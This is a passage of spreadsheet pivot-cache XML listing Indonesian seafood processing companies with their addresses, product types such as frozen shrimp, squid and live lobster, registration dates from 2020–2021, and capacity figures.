    <s v="Jl. Kavling DPR No.181 RT 003 RW 004, Kel. Serua, Kec. Bojongsari, Kota Depok&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-11-18T00:00:00"/>
    <n v="10000000"/>
    <s v="Kota Depok"/>
    <m/>
  </r>
  <r>
    <n v="17356"/>
    <x v="459"/>
    <s v="PT. AGRO WESTINDO ABADI"/>
    <s v="Jl. Kavling DPR No.181 RT 003 RW 004, Kel. Serua, Kec. Bojongsari, Kota Depok&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Segar (Kod)"/>
    <d v="2020-11-18T00:00:00"/>
    <n v="5000000"/>
    <s v="Kota Depok"/>
    <m/>
  </r>
  <r>
    <n v="17357"/>
    <x v="459"/>
    <s v="PT. AGRO WESTINDO ABADI"/>
    <s v="Jl. Kavling DPR No.181 RT 003 RW 004, Kel. Serua, Kec. Bojongsari, Kota Depok&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Kod)"/>
    <d v="2020-11-18T00:00:00"/>
    <n v="5000000"/>
    <s v="Kota Depok"/>
    <m/>
  </r>
  <r>
    <n v="17358"/>
    <x v="459"/>
    <s v="PT. AGRO WESTINDO ABADI"/>
    <s v="Jl. Kavling DPR No.181 RT 003 RW 004, Kel. Serua, Kec. Bojongsari, Kota Depok&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Segar (Halibut, Makerel, Pollock, Sarden)"/>
    <d v="2020-11-18T00:00:00"/>
    <n v="5000000"/>
    <s v="Kota Depok"/>
    <m/>
  </r>
  <r>
    <n v="17359"/>
    <x v="459"/>
    <s v="PT. AGRO WESTINDO ABADI"/>
    <s v="Jl. Kavling DPR No.181 RT 003 RW 004, Kel. Serua, Kec. Bojongsari, Kota Depok&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Kod, Halibut, Makerel, Pollock, Sarden)"/>
    <d v="2020-11-18T00:00:00"/>
    <n v="5000000"/>
    <s v="Kota Depok"/>
    <m/>
  </r>
  <r>
    <n v="17445"/>
    <x v="460"/>
    <s v="TUNAS BARU"/>
    <s v="Lrg. Rimba Sakti RT 20, Desa Pudak, Kec. Kumpeh Ulu, Kabupaten Muaro Jambi&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Kerupuk Tulang Patin"/>
    <d v="2020-04-13T00:00:00"/>
    <n v="400"/>
    <s v="Kota Jambi"/>
    <m/>
  </r>
  <r>
    <n v="19328"/>
    <x v="100"/>
    <s v="PT. SALIM JAYA"/>
    <s v="Jl. Pulau Nias Selatan No.1 KIM III, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kerang Beku"/>
    <d v="2020-03-10T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Medan"/>
    <m/>
  </r>
  <r>
    <n v="20288"/>
    <x v="298"/>
    <s v="CV. BAHAGIA"/>
    <s v="Jl. Gabion No.999 Pelabuhan Perikanan Samudera Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Kuring, Selayang, Sarden, Aso-aso, Tenggiri)"/>
    <d v="2021-01-22T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Medan"/>
    <m/>
  </r>
  <r>
    <n v="16610"/>
    <x v="255"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Raya Kemantrenrejo Km 10 RT 07 RW 01, Kel. Kemantren Rejo, Kec. Rejoso, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Bernilai Tambah Beku"/>
    <d v="2020-04-07T00:00:00"/>
    <n v="20000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16611"/>
    <x v="461"/>
    <s v="PT. DWI BINA UTAMA"/>
    <s v="Jl. Bubara, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Udang Beku"/>
    <d v="2020-06-08T00:00:00"/>
    <n v="200000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16613"/>
    <x v="462"/>
    <s v="CV. MULTI SARANA JAYA"/>
    <s v="Jl. Emboen Suryana, Kel. Sambutan, Kec. Samarinda Ilir, Kota Samarinda&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-01-16T00:00:00"/>
    <n v="240000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16621"/>
    <x v="463"/>
    <s v="PT. PURIBOGA DWI ARTHA"/>
    <s v="JL Prof. DR. Latumenten No.109 H, Kel. Angke, Kec. Tambora, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Nori"/>
    <d v="2020-01-22T00:00:00"/>
    <n v="200"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16624"/>
    <x v="464"/>
    <s v="PT. ANUGRAH SUMBER LAUT"/>
    <s v="Jl. Pemelisan I Gg. Ikan Tumbuk No.17, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Teripang Kering"/>
    <d v="2020-01-13T00:00:00"/>
    <n v="1000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16625"/>
    <x v="464"/>
    <s v="PT. ANUGRAH SUMBER LAUT"/>
    <s v="Jl. Pemelisan I Gg. Ikan Tumbuk No.17, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Udang Segar"/>
    <d v="2020-01-13T00:00:00"/>
    <n v="20000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16633"/>
    <x v="465"/>
    <s v="PT. TOXINDO PRIMA"/>
    <s v="Jl. Lingkar Timur No.5, Kel. Tegalkamulyan, Kec. Cilacap Selatan, Kabupaten Cilacap&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kerang Rebus Beku"/>
    <d v="2020-02-04T00:00:00"/>
    <n v="700"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16636"/>
    <x v="370"/>
    <s v="PT. MAJU MINA LAUT INDONESIA"/>
    <s v="Jl. Husein Sastranegara No.109 RT 003 RW 010 Room 09, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16637"/>
    <x v="379"/>
    <s v="CV. FIRDALI SEJAHTERA"/>
    <s v="Jl. Husein Sastranegara No.109 RT 003 RW 010 Room 07, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16639"/>
    <x v="379"/>
    <s v="CV. FIRDALI SEJAHTERA"/>
    <s v="Jl. Husein Sastranegara No.109 RT 003 RW 010 Room 07, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16642"/>
    <x v="466"/>
    <s v="PT. MITRA KARTIKA SEJATI"/>
    <s v="Jl. Kima Raya I Kav D-1B, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="1500000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16643"/>
    <x v="466"/>
    <s v="PT. MITRA KARTIKA SEJATI"/>
    <s v="Jl. Kima Raya I Kav D-1B, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="500000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16644"/>
    <x v="255"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Raya Kemantrenrejo Km 10 RT 07 RW 01, Kel. Kemantren Rejo, Kec. Rejoso, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Rajungan Bernilai Tambah Beku"/>
    <d v="2020-05-14T00:00:00"/>
    <n v="354295"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16645"/>
    <x v="255"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Raya Kemantrenrejo Km 10 RT 07 RW 01, Kel. Kemantren Rejo, Kec. Rejoso, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Rajungan Pasteurisasi Dingin"/>
    <d v="2020-05-14T00:00:00"/>
    <n v="346189"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16646"/>
    <x v="255"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Raya Kemantrenrejo Km 10 RT 07 RW 01, Kel. Kemantren Rejo, Kec. Rejoso, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Rajungan Pasteurisasi Beku"/>
    <d v="2020-05-14T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16647"/>
    <x v="255"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Raya Kemantrenrejo Km 10 RT 07 RW 01, Kel. Kemantren Rejo, Kec. Rejoso, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Lemadang, Pedang, Tenggiri)"/>
    <d v="2020-05-14T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16648"/>
    <x v="255"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Raya Kemantrenrejo Km 10 RT 07 RW 01, Kel. Kemantren Rejo, Kec. Rejoso, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Segar (Kerapu, Kakap, Barramundi)"/>
    <d v="2020-05-14T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16649"/>
    <x v="255"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Raya Kemantrenrejo Km 10 RT 07 RW 01, Kel. Kemantren Rejo, Kec. Rejoso, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap, Barramundi)"/>
    <d v="2020-05-14T00:00:00"/>
    <n v="310788"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16650"/>
    <x v="255"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Raya Kemantrenrejo Km 10 RT 07 RW 01, Kel. Kemantren Rejo, Kec. Rejoso, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cumi-cumi Bernilai Tambah Beku"/>
    <d v="2020-05-14T00:00:00"/>
    <n v="118639"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16651"/>
    <x v="255"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Raya Kemantrenrejo Km 10 RT 07 RW 01, Kel. Kemantren Rejo, Kec. Rejoso, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-05-14T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16652"/>
    <x v="467"/>
    <s v="CV. TATA NIAGA LESTARI"/>
    <s v="Jl. TWK Abdul Aziz No.32, Kel. Merduati, Kec. Kuta Raja, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Cephalopoda Segar (Cumi-cumi, Gurita, Sotong)"/>
    <d v="2020-01-21T00:00:00"/>
    <n v="5000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16653"/>
    <x v="467"/>
    <s v="CV. TATA NIAGA LESTARI"/>
    <s v="Jl. TWK Abdul Aziz No.32, Kel. Merduati, Kec. Kuta Raja, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-01-21T00:00:00"/>
    <n v="5000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16655"/>
    <x v="467"/>
    <s v="CV. TATA NIAGA LESTARI"/>
    <s v="Jl. TWK Abdul Aziz No.32, Kel. Merduati, Kec. Kuta Raja, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Demersal Segar (Kakap, Kerapu, Bawal, Baronang)"/>
    <d v="2020-01-21T00:00:00"/>
    <n v="5000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16656"/>
    <x v="467"/>
    <s v="CV. TATA NIAGA LESTARI"/>
    <s v="Jl. TWK Abdul Aziz No.32, Kel. Merduati, Kec. Kuta Raja, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Tuna Segar"/>
    <d v="2020-01-21T00:00:00"/>
    <n v="5000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16657"/>
    <x v="336"/>
    <s v="CV. IKANDI LAUT INDONESIA"/>
    <s v="Jl. Raya Perancis Blok B3 No.1 RT 04 RW 08, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Asin Kering"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="95000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16658"/>
    <x v="336"/>
    <s v="CV. IKANDI LAUT INDONESIA"/>
    <s v="Jl. Raya Perancis Blok B3 No.1 RT 04 RW 08, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Perut Ikan Kering"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="95000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16659"/>
    <x v="336"/>
    <s v="CV. IKANDI LAUT INDONESIA"/>
    <s v="Jl. Raya Perancis Blok B3 No.1 RT 04 RW 08, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Teripang Kering"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="95000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16660"/>
    <x v="336"/>
    <s v="CV. IKANDI LAUT INDONESIA"/>
    <s v="Jl. Raya Perancis Blok B3 No.1 RT 04 RW 08, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Ronggeng Hidup"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="95000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16661"/>
    <x v="336"/>
    <s v="CV. IKANDI LAUT INDONESIA"/>
    <s v="Jl. Raya Perancis Blok B3 No.1 RT 04 RW 08, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerapu Hidup"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="95000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16662"/>
    <x v="336"/>
    <s v="CV. IKANDI LAUT INDONESIA"/>
    <s v="Jl. Raya Perancis Blok B3 No.1 RT 04 RW 08, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="95000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16663"/>
    <x v="336"/>
    <s v="CV. IKANDI LAUT INDONESIA"/>
    <s v="Jl. Raya Perancis Blok B3 No.1 RT 04 RW 08, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Lobster Hidup"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="95000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16665"/>
    <x v="336"/>
    <s v="CV. IKANDI LAUT INDONESIA"/>
    <s v="Jl. Raya Perancis Blok B3 No.1 RT 04 RW 08, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Lobster Beku, Kepiting Beku"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="95000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16666"/>
    <x v="336"/>
    <s v="CV. IKANDI LAUT INDONESIA"/>
    <s v="Jl. Raya Perancis Blok B3 No.1 RT 04 RW 08, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Kering"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="95000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16669"/>
    <x v="336"/>
    <s v="CV. IKANDI LAUT INDONESIA"/>
    <s v="Jl. Raya Perancis Blok B3 No.1 RT 04 RW 08, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Beku"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="55000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16670"/>
    <x v="336"/>
    <s v="CV. IKANDI LAUT INDONESIA"/>
    <s v="Jl. Raya Perancis Blok B3 No.1 RT 04 RW 08, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Telur Ikan Beku"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="55000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16672"/>
    <x v="336"/>
    <s v="CV. IKANDI LAUT INDONESIA"/>
    <s v="Jl. Raya Perancis Blok B3 No.1 RT 04 RW 08, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Tuna Beku"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="95000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16675"/>
    <x v="468"/>
    <s v="PT. CELEBES MINAPRATAMA"/>
    <s v="Jl. W. Mongisidi KM 5, Kel. Wangurer Timur LK 1 RT 05, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ekstrak Air Rebusan Ikan"/>
    <d v="2020-01-30T00:00:00"/>
    <n v="5000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16676"/>
    <x v="468"/>
    <s v="PT. CELEBES MINAPRATAMA"/>
    <s v="Jl. W. Mongisidi KM 5, Kel. Wangurer Timur LK 1 RT 05, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tepung Ikan"/>
    <d v="2020-01-30T00:00:00"/>
    <n v="400000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16677"/>
    <x v="468"/>
    <s v="PT. CELEBES MINAPRATAMA"/>
    <s v="Jl. W. Mongisidi KM 5, Kel. Wangurer Timur LK 1 RT 05, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Kayu"/>
    <d v="2020-01-30T00:00:00"/>
    <n v="80000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16682"/>
    <x v="469"/>
    <s v="PT. MUSTIKA MINANUSA AURORA"/>
    <s v="Jl. Buntu Komplek Pelabuhan Perikanan Pantai Tarakan, Kel. Karang Anayar Pantai, Kec. Tarakan Barat, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Kerang Hidup"/>
    <d v="2020-01-07T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16685"/>
    <x v="343"/>
    <s v="PT. CENTRALPERTIWI BAHARI"/>
    <s v="Jl. Rungkut Industri III No.81- 83, Kel. Rungkut Tengah, Kec. Gunung Anyar, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-04-20T00:00:00"/>
    <n v="1080000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16687"/>
    <x v="444"/>
    <s v="CV. SINAR LAUT ABADI TUBAN"/>
    <s v="Jl. Raya Sugih Waras, Dusun Jabung, Kel. Sugihwaras, Kec. Jenu, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Cumi-Cumi)"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="200000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16688"/>
    <x v="444"/>
    <s v="CV. SINAR LAUT ABADI TUBAN"/>
    <s v="Jl. Raya Sugih Waras, Dusun Jabung, Kel. Sugihwaras, Kec. Jenu, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Tenggiri)"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="5000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16689"/>
    <x v="444"/>
    <s v="CV. SINAR LAUT ABADI TUBAN"/>
    <s v="Jl. Raya Sugih Waras, Dusun Jabung, Kel. Sugihwaras, Kec. Jenu, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="5000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16690"/>
    <x v="444"/>
    <s v="CV. SINAR LAUT ABADI TUBAN"/>
    <s v="Jl. Raya Sugih Waras, Dusun Jabung, Kel. Sugihwaras, Kec. Jenu, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teri Nasi Beku"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16691"/>
    <x v="444"/>
    <s v="CV. SINAR LAUT ABADI TUBAN"/>
    <s v="Jl. Raya Sugih Waras, Dusun Jabung, Kel. Sugihwaras, Kec. Jenu, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Kering"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16692"/>
    <x v="444"/>
    <s v="CV. SINAR LAUT ABADI TUBAN"/>
    <s v="Jl. Raya Sugih Waras, Dusun Jabung, Kel. Sugihwaras, Kec. Jenu, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Beku"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16694"/>
    <x v="329"/>
    <s v="PT. MAYA FOOD INDUSTRIES"/>
    <s v="Jl. Jlamprang Krapyak Lor Blok S Tembok RT 004 RW 002, Kel. Krapyak , Kec. Pekalongan Utara , Kota Pekalongan&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="1000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16698"/>
    <x v="329"/>
    <s v="PT. MAYA FOOD INDUSTRIES"/>
    <s v="Jl. Jlamprang Krapyak Lor Blok S Tembok RT 004 RW 002, Kel. Krapyak , Kec. Pekalongan Utara , Kota Pekalongan&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kerang Beku"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="1000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16701"/>
    <x v="470"/>
    <s v="PT. FOSS CAHAYA BINTANG LAUT"/>
    <s v="Kp. Gaga Rawa Kompeni RT 001 RW 008, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="50000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16702"/>
    <x v="470"/>
    <s v="PT. FOSS CAHAYA BINTANG LAUT"/>
    <s v="Kp. Gaga Rawa Kompeni RT 001 RW 008, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Hidup"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16703"/>
    <x v="470"/>
    <s v="PT. FOSS CAHAYA BINTANG LAUT"/>
    <s v="Kp. Gaga Rawa Kompeni RT 001 RW 008, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Keong Hidup"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16704"/>
    <x v="470"/>
    <s v="PT. FOSS CAHAYA BINTANG LAUT"/>
    <s v="Kp. Gaga Rawa Kompeni RT 001 RW 008, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Lobster Hidup"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="40000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16705"/>
    <x v="470"/>
    <s v="PT. FOSS CAHAYA BINTANG LAUT"/>
    <s v="Kp. Gaga Rawa Kompeni RT 001 RW 008, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerapu Hidup"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="50000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16706"/>
    <x v="470"/>
    <s v="PT. FOSS CAHAYA BINTANG LAUT"/>
    <s v="Kp. Gaga Rawa Kompeni RT 001 RW 008, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Ronggeng Hidup"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="50000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16709"/>
    <x v="329"/>
    <s v="PT. MAYA FOOD INDUSTRIES"/>
    <s v="Jl. Jlamprang Krapyak Lor Blok S Tembok RT 004 RW 002, Kel. Krapyak , Kec. Pekalongan Utara , Kota Pekalongan&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demesal Beku (Mata Goyang, Gulama, Kuniran, Remang, Layur, Rejung, Ayam-ayam, Kurisi)"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16711"/>
    <x v="471"/>
    <s v="UD. SAMUDERA JAYA"/>
    <s v="Jl. Terboyo Industri Barat Blok E No.4 Kawasan Industri Terboyo, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Rumput Laut Beku"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="300000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16717"/>
    <x v="70"/>
    <s v="PT. INDO LAUTAN MAKMUR"/>
    <s v="Jl. Raya Rembang Sarang, Kel. Labuhan Kidul, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2020-02-03T00:00:00"/>
    <n v="300000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16718"/>
    <x v="70"/>
    <s v="PT. INDO LAUTAN MAKMUR"/>
    <s v="Jl. Raya Rembang Sarang, Kel. Labuhan Kidul, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Telur Ikan Terbang Beku"/>
    <d v="2020-02-03T00:00:00"/>
    <n v="300000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16719"/>
    <x v="70"/>
    <s v="PT. INDO LAUTAN MAKMUR"/>
    <s v="Jl. Raya Rembang Sarang, Kel. Labuhan Kidul, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Pasta Ikan Beku"/>
    <d v="2020-02-03T00:00:00"/>
    <n v="300000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16721"/>
    <x v="70"/>
    <s v="PT. INDO LAUTAN MAKMUR"/>
    <s v="Jl. Raya Rembang Sarang, Kel. Labuhan Kidul, Kec. Sluke, Kabupaten Rembang"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="&lt;br&gt;Jawa Tengah&quot;"/>
    <x v="472"/>
    <s v="Ikan Demersal Beku (Swanggi, Gulama, Kuniran, Kerapu, Bawal, Ekor Kuning)"/>
